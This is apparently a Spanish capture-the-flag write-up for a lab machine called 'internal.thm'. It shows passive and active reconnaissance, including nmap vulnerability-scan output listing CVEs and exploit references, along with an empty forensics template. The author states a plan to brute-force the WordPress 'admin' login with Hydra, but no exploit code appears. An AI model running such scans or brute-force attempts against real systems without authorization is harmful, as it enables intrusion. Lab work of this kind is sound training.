👨‍🏫WRITEUP RESUMEN

👁️ RECONOCIMIENTO PASIVO ✔️

AUDITORIA DE: ((RELEVANT))

---

---

RECONOCIMIENTO PASIVO

• BROWSER --------------------------------->https://www.paimon.com.ar/

  ┌──(root㉿kali)-[~]
  └─# echo "10.10.7.3  internal.thm" | sudo tee -a /etc/hosts
  
  10.10.7.3  internal.thm
  
  
  URL:
  
  http://internal.thm/
  
  

  • CONCLUSION: VEMOS UN SERVIDOR APACHE POR EL PUERTO 80

  

  Apache2 Ubuntu Default Page_ It works
• BROWSER --------------------------------->https://www.paimon.com.ar/

  ┌──(root㉿kali)-[~]
  └─# echo "10.10.7.3  internal.thm" | sudo tee -a /etc/hosts
  
  10.10.7.3  internal.thm
  
  URL:
  
  http://internal.thm/blog/
  
  

  • CONCLUSION: VEMOS EL SITIO OFICIAL DE INTERNAL.

  
• BROWSER --------------------------------->https://www.paimon.com.ar/

  ┌──(root㉿kali)-[~]
  └─# echo "10.10.7.3  internal.thm" | sudo tee -a /etc/hosts
  
  10.10.7.3  internal.thm
  
  URL:
  
  http://internal.thm/phpmyadmin/
  
  

  • CONCLUSION: VEMOS UN LOGIN PHPMYADMIN.

  
• BROWSER --------------------------------->https://www.paimon.com.ar/

  ┌──(root㉿kali)-[~]
  └─# echo "10.10.7.3  internal.thm" | sudo tee -a /etc/hosts
  
  10.10.7.3  internal.thm
  
  URL:
  
  http://internal.thm/wordpress/wp-login.php
  
  

  • CONCLUSION: VEMOS UN LOGIN DE WORPRES PHP

  
• BROWSER --------------------------------->https://www.paimon.com.ar/

  ┌──(root㉿kali)-[~]
  └─# echo "10.10.7.3  internal.thm" | sudo tee -a /etc/hosts
  
  10.10.7.3  internal.thm
  
  URL:
  
  http://internal.thm/blog/wp-login.php
  
  

  • CONCLUSION: VEMOS EL LOGIN WORPRESS APARENTE DEL SITIO WEB INTERNAL

  

• BROWSER --------------------------------->https://www.paimon.com.ar/

  http://internal.thm/blog/index.php/author/admin/
  
  

  

  post_posible_usuario_admin_en_internal

  • CONCLUSION: VEMOS EN EL SITIO BLOG UQE HAY UN POSTEO DE UN POSIBLE USUARIO 'ADMIN' SAI QUE INTENTAREMOS FUERZA BRUTA CON ESTE POISIBLE USUARIO CON HYDRA.

• WAPPALYZER --------------------------------->https://www.wappalyzer.com/

  Gestor de Contenido
  
  WordPress
  5.4.2
  Gestor de Bases de Datos
  
  phpMyAdmin
  Herramienta de Documentación
  
  Sphinx
  Blog
  
  WordPress
  5.4.2
  Tipografía
  
  Google Font API
  
  Twitter Emoji (Twemoji)
  12.1.3
  Miscelánea
  
  Pygments
  
  RSS
  Editor
  
  CodeMirror
  5.4.0
  Servidor Web
  
  Apache HTTP Server
  2.4.29
  Lenguaje de programación
  
  PHP
  Sistema Operativo
  
  Ubuntu
  Base de Datos
  
  MySQL
  Librerías JavaScript
  
  Underscore.js
  1.8.3
  
  jQuery Migrate
  1.4.1
  
  jQuery UI
  1.11.4
  
  jQuery
  1.12.4
  Temas de WordPress
  
  Twenty Seventeen

  • CONCLUSION: VEMOS TECNOLOGIAS DE WORDPRESS DEL SITIO WEB

---

---

🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫

🔬 ANALISIS FORENSE ❌

ANALISIS FORENSE

• AUTOPSY👈 https://tools.kali.org/forensics/autopsy--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• AUTOPSY👈 https://tools.kali.org/forensics/autopsy--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• AUTOPSY👈 https://tools.kali.org/forensics/autopsy--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• VOLATILITY👈 https://github.com/volatilityfoundation/volatility--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• VOLATILITY👈 https://github.com/volatilityfoundation/volatility--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• VOLATILITY👈 https://github.com/volatilityfoundation/volatility--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• FTK👈 https://www.accessdata.com/products-services/forensic-toolkit-ftk--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• FTK👈 https://www.accessdata.com/products-services/forensic-toolkit-ftk--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• FTK👈 https://www.accessdata.com/products-services/forensic-toolkit-ftk--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• DFF👈 (Digital Forensics Framework) https://github.com/arxsys/dff

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• TSK👈 (The Sleuth Kit) https://tools.kali.org/forensics/sleuthkit

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• X-WAYS Forensics👈 https://www.x-ways.net/forensics/index-m.html

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• FOREMOST👈 https://github.com/korczis/foremost

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• HxD👈 https://mh-nexus.de/en/hxd/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• HxD👈 https://mh-nexus.de/en/hxd/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• XXD👈 https://tools.kali.org/forensics/xxd

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• XXD👈 https://tools.kali.org/forensics/xxd

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• XXD👈 https://tools.kali.org/forensics/xxd

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

---

---

🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦

👊 RECONOCIMIENTO ACTIVO ✔️

RECONOCIMIENTO ACTIVO

• PING --------------------------------->https://www.kali.org/tools/fping/

  ┌──(root㉿kali)-[~]
  └─# ping 10.10.7.3   
  PING 10.10.7.3 (10.10.7.3) 56(84) bytes of data.
  64 bytes from 10.10.7.3: icmp_seq=1 ttl=64 time=0.879 ms
  64 bytes from 10.10.7.3: icmp_seq=2 ttl=64 time=0.462 ms
  64 bytes from 10.10.7.3: icmp_seq=3 ttl=64 time=0.401 ms
  ^C
  --- 10.10.7.3 ping statistics ---
  3 packets transmitted, 3 received, 0% packet loss, time 2038ms
  rtt min/avg/max/mdev = 0.401/0.580/0.879/0.212 ms

  • CONCLUSION: VEMOS UN TTL DE 64 QUE NOS INDICA QUE SERIA UNA MAQUINA LINUX

• NMAP --------------------------------->https://nmap.org/ --->PDF-TOOL

  ┌──(root㉿kali)-[~]
  └─# nmap -sS -p- 10.10.7.3    
  Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-24 03:29 UTC
  Nmap scan report for ip-10-10-7-3.eu-west-1.compute.internal (10.10.7.3)
  Host is up (0.0068s latency).
  Not shown: 65533 closed tcp ports (reset)
  PORT   STATE SERVICE
  22/tcp open  ssh
  80/tcp open  http
  MAC Address: 02:1F:8F:6A:E6:F3 (Unknown)
  
  Nmap done: 1 IP address (1 host up) scanned in 3.63 seconds
  
  
  ---------------------------------------------
  
  ┌──(root㉿kali)-[~]
  └─# nmap -sS -sV -O -script='vuln' 10.10.7.3
  Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-24 03:22 UTC
  Nmap scan report for ip-10-10-7-3.eu-west-1.compute.internal (10.10.7.3)
  Host is up (0.00038s latency).
  Not shown: 998 closed tcp ports (reset)
  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  | vulners: 
  |   cpe:/a:openbsd:openssh:7.6p1: 
  |       PRION:CVE-2019-6111     5.8     https://vulners.com/prion/PRION:CVE-2019-6111
  |       EXPLOITPACK:98FE96309F9524B8C84C508837551A19    5.8     https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19   *EXPLOIT*
  |       EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    5.8     https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97   *EXPLOIT*
  |       EDB-ID:46516    5.8     https://vulners.com/exploitdb/EDB-ID:46516      *EXPLOIT*
  |       EDB-ID:46193    5.8     https://vulners.com/exploitdb/EDB-ID:46193      *EXPLOIT*
  |       CVE-2019-6111   5.8     https://vulners.com/cve/CVE-2019-6111
  |       1337DAY-ID-32328        5.8     https://vulners.com/zdt/1337DAY-ID-32328        *EXPLOIT*
  |       1337DAY-ID-32009        5.8     https://vulners.com/zdt/1337DAY-ID-32009        *EXPLOIT*
  |       SSH_ENUM        5.0     https://vulners.com/canvas/SSH_ENUM     *EXPLOIT*
  |       PRION:CVE-2018-15919    5.0     https://vulners.com/prion/PRION:CVE-2018-15919
  |       PRION:CVE-2018-15473    5.0     https://vulners.com/prion/PRION:CVE-2018-15473
  |       PACKETSTORM:150621      5.0     https://vulners.com/packetstorm/PACKETSTORM:150621      *EXPLOIT*
  |       MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-        5.0     https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-        *EXPLOIT*
  |       EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    5.0     https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0   *EXPLOIT*
  |       EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    5.0     https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283   *EXPLOIT*
  |       EDB-ID:45939    5.0     https://vulners.com/exploitdb/EDB-ID:45939      *EXPLOIT*
  |       CVE-2018-15919  5.0     https://vulners.com/cve/CVE-2018-15919
  |       CVE-2018-15473  5.0     https://vulners.com/cve/CVE-2018-15473
  |       1337DAY-ID-31730        5.0     https://vulners.com/zdt/1337DAY-ID-31730        *EXPLOIT*
  |       PRION:CVE-2019-16905    4.4     https://vulners.com/prion/PRION:CVE-2019-16905
  |       CVE-2020-14145  4.3     https://vulners.com/cve/CVE-2020-14145
  |       PRION:CVE-2019-6110     4.0     https://vulners.com/prion/PRION:CVE-2019-6110
  |       PRION:CVE-2019-6109     4.0     https://vulners.com/prion/PRION:CVE-2019-6109
  |       CVE-2019-6110   4.0     https://vulners.com/cve/CVE-2019-6110
  |       CVE-2019-6109   4.0     https://vulners.com/cve/CVE-2019-6109
  |       PRION:CVE-2018-20685    2.6     https://vulners.com/prion/PRION:CVE-2018-20685
  |       CVE-2018-20685  2.6     https://vulners.com/cve/CVE-2018-20685
  |       PACKETSTORM:151227      0.0     https://vulners.com/packetstorm/PACKETSTORM:151227      *EXPLOIT*
  |_      1337DAY-ID-30937        0.0     https://vulners.com/zdt/1337DAY-ID-30937        *EXPLOIT*
  80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
  |_http-dombased-xss: Couldn't find any DOM based XSS.
  |_http-csrf: Couldn't find any CSRF vulnerabilities.
  | http-enum: 
  |   /blog/: Blog
  |   /phpmyadmin/: phpMyAdmin
  |   /wordpress/wp-login.php: Wordpress login page.
  |_  /blog/wp-login.php: Wordpress login page.
  |_http-server-header: Apache/2.4.29 (Ubuntu)
  | vulners: 
  |   cpe:/a:apache:http_server:2.4.29: 
  |       CVE-2019-9517   7.8     https://vulners.com/cve/CVE-2019-9517
  |       PACKETSTORM:176334      7.5     https://vulners.com/packetstorm/PACKETSTORM:176334      *EXPLOIT*
  |       PACKETSTORM:171631      7.5     https://vulners.com/packetstorm/PACKETSTORM:171631      *EXPLOIT*
  |       OSV:BIT-APACHE-2023-25690       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2023-25690
  |       OSV:BIT-APACHE-2022-31813       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-31813
  |       OSV:BIT-APACHE-2022-23943       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-23943
  |       OSV:BIT-APACHE-2022-22720       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-22720
  |       OSV:BIT-APACHE-2021-44790       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-44790
  |       OSV:BIT-APACHE-2021-42013       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-42013
  |       OSV:BIT-APACHE-2021-41773       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-41773
  |       OSV:BIT-APACHE-2021-39275       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-39275
  |       OSV:BIT-APACHE-2021-26691       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-26691
  |       OSV:BIT-APACHE-2020-11984       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2020-11984
  |       MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-       7.5     https://vulners.com/metasploit/MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-       *EXPLOIT*
  |       MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-       7.5     https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-       *EXPLOIT*
  |       F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5    7.5     https://vulners.com/githubexploit/F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5*EXPLOIT*
  |       EDB-ID:51193    7.5     https://vulners.com/exploitdb/EDB-ID:51193      *EXPLOIT*
  |       EDB-ID:50512    7.5     https://vulners.com/exploitdb/EDB-ID:50512      *EXPLOIT*
  |       EDB-ID:50446    7.5     https://vulners.com/exploitdb/EDB-ID:50446      *EXPLOIT*
  |       EDB-ID:50406    7.5     https://vulners.com/exploitdb/EDB-ID:50406      *EXPLOIT*
  |       E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6    7.5     https://vulners.com/githubexploit/E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6*EXPLOIT*
  |       CVE-2023-25690  7.5     https://vulners.com/cve/CVE-2023-25690
  |       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
  |       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
  |       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
  |       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
  |       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
  |       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
  |       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
  |       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
  |       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
  |       CC15AE65-B697-525A-AF4B-38B1501CAB49    7.5     https://vulners.com/githubexploit/CC15AE65-B697-525A-AF4B-38B1501CAB49*EXPLOIT*
  |       9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5    7.5     https://vulners.com/githubexploit/9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5*EXPLOIT*
  |       8713FD59-264B-5FD7-8429-3251AB5AB3B8    7.5     https://vulners.com/githubexploit/8713FD59-264B-5FD7-8429-3251AB5AB3B8*EXPLOIT*
  |       6A0A657E-8300-5312-99CE-E11F460B1DBF    7.5     https://vulners.com/githubexploit/6A0A657E-8300-5312-99CE-E11F460B1DBF*EXPLOIT*
  |       61075B23-F713-537A-9B84-7EB9B96CF228    7.5     https://vulners.com/githubexploit/61075B23-F713-537A-9B84-7EB9B96CF228*EXPLOIT*
  |       5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9    7.5     https://vulners.com/githubexploit/5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9*EXPLOIT*
  |       5312D04F-9490-5472-84FA-86B3BBDC8928    7.5     https://vulners.com/githubexploit/5312D04F-9490-5472-84FA-86B3BBDC8928*EXPLOIT*
  |       52E13088-9643-5E81-B0A0-B7478BCF1F2C    7.5     https://vulners.com/githubexploit/52E13088-9643-5E81-B0A0-B7478BCF1F2C*EXPLOIT*
  |       3F17CA20-788F-5C45-88B3-E12DB2979B7B    7.5     https://vulners.com/githubexploit/3F17CA20-788F-5C45-88B3-E12DB2979B7B*EXPLOIT*
  |       22DCCD26-B68C-5905-BAC2-71D10DE3F123    7.5     https://vulners.com/githubexploit/22DCCD26-B68C-5905-BAC2-71D10DE3F123*EXPLOIT*
  |       2108729F-1E99-54EF-9A4B-47299FD89FF2    7.5     https://vulners.com/githubexploit/2108729F-1E99-54EF-9A4B-47299FD89FF2*EXPLOIT*
  |       1337DAY-ID-39214        7.5     https://vulners.com/zdt/1337DAY-ID-39214        *EXPLOIT*
  |       1337DAY-ID-38427        7.5     https://vulners.com/zdt/1337DAY-ID-38427        *EXPLOIT*
  |       1337DAY-ID-37777        7.5     https://vulners.com/zdt/1337DAY-ID-37777        *EXPLOIT*
  |       1337DAY-ID-36952        7.5     https://vulners.com/zdt/1337DAY-ID-36952        *EXPLOIT*
  |       1337DAY-ID-34882        7.5     https://vulners.com/zdt/1337DAY-ID-34882        *EXPLOIT*
  |       EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB    7.2     https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB   *EXPLOIT*
  |       EDB-ID:46676    7.2     https://vulners.com/exploitdb/EDB-ID:46676      *EXPLOIT*
  |       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211
  |       1337DAY-ID-32502        7.2     https://vulners.com/zdt/1337DAY-ID-32502        *EXPLOIT*
  |       OSV:BIT-APACHE-2021-40438       6.8     https://vulners.com/osv/OSV:BIT-APACHE-2021-40438
  |       OSV:BIT-APACHE-2020-35452       6.8     https://vulners.com/osv/OSV:BIT-APACHE-2020-35452
  |       FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8    6.8     https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8*EXPLOIT*
  |       CVE-2021-40438  6.8     https://vulners.com/cve/CVE-2021-40438
  |       CVE-2020-35452  6.8     https://vulners.com/cve/CVE-2020-35452
  |       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
  |       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
  |       CNVD-2022-03224 6.8     https://vulners.com/cnvd/CNVD-2022-03224
  |       AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C    6.8     https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C*EXPLOIT*
  |       8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2    6.8     https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2*EXPLOIT*
  |       4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332    6.8     https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332*EXPLOIT*
  |       4373C92A-2755-5538-9C91-0469C995AA9B    6.8     https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B*EXPLOIT*
  |       36618CA8-9316-59CA-B748-82F15F407C4F    6.8     https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F*EXPLOIT*
  |       0095E929-7573-5E4A-A7FA-F6598A35E8DE    6.8     https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE*EXPLOIT*
  |       OSV:BIT-APACHE-2022-28615       6.4     https://vulners.com/osv/OSV:BIT-APACHE-2022-28615
  |       OSV:BIT-APACHE-2021-44224       6.4     https://vulners.com/osv/OSV:BIT-APACHE-2021-44224
  |       OSV:BIT-2023-31122      6.4     https://vulners.com/osv/OSV:BIT-2023-31122
  |       CVE-2022-28615  6.4     https://vulners.com/cve/CVE-2022-28615
  |       CVE-2021-44224  6.4     https://vulners.com/cve/CVE-2021-44224
  |       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082
  |       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
  |       OSV:BIT-APACHE-2022-22721       5.8     https://vulners.com/osv/OSV:BIT-APACHE-2022-22721
  |       OSV:BIT-APACHE-2020-1927        5.8     https://vulners.com/osv/OSV:BIT-APACHE-2020-1927
  |       CVE-2022-22721  5.8     https://vulners.com/cve/CVE-2022-22721
  |       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
  |       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
  |       1337DAY-ID-33577        5.8     https://vulners.com/zdt/1337DAY-ID-33577        *EXPLOIT*
  |       OSV:BIT-APACHE-2022-36760       5.1     https://vulners.com/osv/OSV:BIT-APACHE-2022-36760
  |       CVE-2022-36760  5.1     https://vulners.com/cve/CVE-2022-36760
  |       OSV:BIT-APACHE-2023-45802       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
  |       OSV:BIT-APACHE-2023-43622       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
  |       OSV:BIT-APACHE-2023-31122       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
  |       OSV:BIT-APACHE-2023-27522       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2023-27522
  |       OSV:BIT-APACHE-2022-37436       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-37436
  |       OSV:BIT-APACHE-2022-30556       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-30556
  |       OSV:BIT-APACHE-2022-30522       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-30522
  |       OSV:BIT-APACHE-2022-29404       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-29404
  |       OSV:BIT-APACHE-2022-28614       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-28614
  |       OSV:BIT-APACHE-2022-28330       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-28330
  |       OSV:BIT-APACHE-2022-26377       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-26377
  |       OSV:BIT-APACHE-2022-22719       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-22719
  |       OSV:BIT-APACHE-2021-41524       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-41524
  |       OSV:BIT-APACHE-2021-36160       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-36160
  |       OSV:BIT-APACHE-2021-34798       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-34798
  |       OSV:BIT-APACHE-2021-33193       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-33193
  |       OSV:BIT-APACHE-2021-31618       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
  |       OSV:BIT-APACHE-2021-30641       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-30641
  |       OSV:BIT-APACHE-2021-26690       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-26690
  |       OSV:BIT-APACHE-2020-9490        5.0     https://vulners.com/osv/OSV:BIT-APACHE-2020-9490
  |       OSV:BIT-APACHE-2020-1934        5.0     https://vulners.com/osv/OSV:BIT-APACHE-2020-1934
  |       OSV:BIT-APACHE-2020-13950       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2020-13950
  |       OSV:BIT-2023-45802      5.0     https://vulners.com/osv/OSV:BIT-2023-45802
  |       OSV:BIT-2023-43622      5.0     https://vulners.com/osv/OSV:BIT-2023-43622
  |       F7F6E599-CEF4-5E03-8E10-FE18C4101E38    5.0     https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38*EXPLOIT*
  |       E5C174E5-D6E8-56E0-8403-D287DE52EB3F    5.0     https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F*EXPLOIT*
  |       DB6E1BBD-08B1-574D-A351-7D6BB9898A4A    5.0     https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A*EXPLOIT*
  |       CVE-2023-31122  5.0     https://vulners.com/cve/CVE-2023-31122
  |       CVE-2022-37436  5.0     https://vulners.com/cve/CVE-2022-37436
  |       CVE-2022-30556  5.0     https://vulners.com/cve/CVE-2022-30556
  |       CVE-2022-29404  5.0     https://vulners.com/cve/CVE-2022-29404
  |       CVE-2022-28614  5.0     https://vulners.com/cve/CVE-2022-28614
  |       CVE-2022-26377  5.0     https://vulners.com/cve/CVE-2022-26377
  |       CVE-2022-22719  5.0     https://vulners.com/cve/CVE-2022-22719
  |       CVE-2021-34798  5.0     https://vulners.com/cve/CVE-2021-34798
  |       CVE-2021-33193  5.0     https://vulners.com/cve/CVE-2021-33193
  |       CVE-2021-26690  5.0     https://vulners.com/cve/CVE-2021-26690
  |       CVE-2020-9490   5.0     https://vulners.com/cve/CVE-2020-9490
  |       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
  |       CVE-2019-17567  5.0     https://vulners.com/cve/CVE-2019-17567
  |       CVE-2019-10081  5.0     https://vulners.com/cve/CVE-2019-10081
  |       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
  |       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196
  |       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
  |       CVE-2018-17189  5.0     https://vulners.com/cve/CVE-2018-17189
  |       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333
  |       CVE-2018-1303   5.0     https://vulners.com/cve/CVE-2018-1303
  |       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
  |       CVE-2006-20001  5.0     https://vulners.com/cve/CVE-2006-20001
  |       CNVD-2023-93320 5.0     https://vulners.com/cnvd/CNVD-2023-93320
  |       CNVD-2023-80558 5.0     https://vulners.com/cnvd/CNVD-2023-80558
  |       CNVD-2022-73122 5.0     https://vulners.com/cnvd/CNVD-2022-73122
  |       CNVD-2022-53584 5.0     https://vulners.com/cnvd/CNVD-2022-53584
  |       CNVD-2022-53582 5.0     https://vulners.com/cnvd/CNVD-2022-53582
  |       CNVD-2022-03223 5.0     https://vulners.com/cnvd/CNVD-2022-03223
  |       C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B    5.0     https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B*EXPLOIT*
  |       BD3652A9-D066-57BA-9943-4E34970463B9    5.0     https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9*EXPLOIT*
  |       B0208442-6E17-5772-B12D-B5BE30FA5540    5.0     https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540*EXPLOIT*
  |       A820A056-9F91-5059-B0BC-8D92C7A31A52    5.0     https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52*EXPLOIT*
  |       9814661A-35A4-5DB7-BB25-A1040F365C81    5.0     https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81*EXPLOIT*
  |       5A864BCC-B490-5532-83AB-2E4109BB3C31    5.0     https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31*EXPLOIT*
  |       17C6AD2A-8469-56C8-BBBE-1764D0DF1680    5.0     https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680*EXPLOIT*
  |       OSV:BIT-APACHE-2020-11993       4.3     https://vulners.com/osv/OSV:BIT-APACHE-2020-11993
  |       FF610CB4-801A-5D1D-9AC9-ADFC287C8482    4.3     https://vulners.com/githubexploit/FF610CB4-801A-5D1D-9AC9-ADFC287C8482*EXPLOIT*
  |       FDF4BBB1-979C-5320-95EA-9EC7EB064D72    4.3     https://vulners.com/githubexploit/FDF4BBB1-979C-5320-95EA-9EC7EB064D72*EXPLOIT*
  |       FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46    4.3     https://vulners.com/githubexploit/FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46*EXPLOIT*
  |       EDB-ID:50383    4.3     https://vulners.com/exploitdb/EDB-ID:50383      *EXPLOIT*
  |       E7B177F6-FA62-52FE-A108-4B8FC8112B7F    4.3     https://vulners.com/githubexploit/E7B177F6-FA62-52FE-A108-4B8FC8112B7F*EXPLOIT*
  |       E6B39247-8016-5007-B505-699F05FCA1B5    4.3     https://vulners.com/githubexploit/E6B39247-8016-5007-B505-699F05FCA1B5*EXPLOIT*
